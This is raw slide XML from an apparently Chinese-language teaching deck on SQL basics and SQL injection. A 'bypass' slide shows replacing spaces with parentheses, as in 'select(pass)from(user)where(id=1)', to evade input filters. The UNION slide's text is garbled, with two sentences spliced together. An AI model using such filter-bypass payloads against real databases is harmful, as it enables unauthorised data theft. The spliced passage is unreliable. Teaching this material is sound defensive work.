            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可以没有多余的空格。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A8C760-1263-4E09-8181-871C236104BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460180" y="4081772"/>
            <a:ext cx="6950713" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>select(pass)from(user)where(id=1)     </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1082671917"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473147" y="347084"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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pc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F04D6A6E-7CE6-4B0F-949B-2CFD97C2D2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496277" y="2079944"/>
            <a:ext cx="5708614" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句不区分大小写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>关键字和函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C774BDF2-3A93-4910-A0AB-D9AA249950D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496277" y="2731874"/>
            <a:ext cx="4185761" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句的关键字不能拆开写</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6698FEC-A01F-4050-BA25-8261EF8C20FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461473" y="3429000"/>
            <a:ext cx="10974479" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句中表名、列名等不用加引号，而表中的数据要加引号（数值型除外）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506A9063-63A2-47AD-8125-A799B95F7095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496277" y="4121962"/>
            <a:ext cx="7553671" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句使用点号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(.)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表示从属关系（库和表，表和列）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2940753772"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F1723A-510B-4CB3-A962-16151C726573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767474" y="1258515"/>
            <a:ext cx="11155237" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>代替空格</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的多种方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A87879B-F841-4C95-AC31-538E85D28EA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005624" y="2314563"/>
            <a:ext cx="10917087" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>select A from B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>前的空格</a:t>
            </a:r>
          </a:p>
          <a:p>
